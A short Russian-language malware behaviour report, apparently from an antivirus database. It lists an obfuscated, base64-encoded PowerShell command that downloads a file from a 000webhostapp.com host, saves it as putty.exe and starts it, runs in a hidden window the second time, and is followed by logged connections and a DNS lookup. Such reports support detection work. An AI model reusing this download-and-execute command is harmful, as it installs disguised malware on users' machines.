Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $code = 'JHBhdGggPSAiLi5ccHV0dHkuZXhlIjsgJHdjID0gbmV3LW9iamVjdCBuZXQud2ViY2xpZW50OyAkd2MuZG93bmxvYWRmaWxlKCJodHRwczovL29wYTBwYS4wMDB3ZWJob3N0YXBwLmNvbS9vbmUub25lIiwgJHBhdGgpOyBzdGFydC1wcm9jZXNz...
- 'op####.#00webhostapp.com':443
- 'op####.#00webhostapp.com':443
- DNS ASK op####.#00webhostapp.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $code = 'JHBhdGggPSAiLi5ccHV0dHkuZXhlIjsgJHdjID0gbmV3LW9iamVjdCBuZXQud2ViY2xpZW50OyAkd2MuZG93bmxvYWRmaWxlKCJodHRwczovL29wYTBwYS4wMDB3ZWJob3N0YXBwLmNvbS9vbmUub25lIiwgJHBhdGgpOyBzdGFydC1wcm9jZXNz...' (со скрытым окном)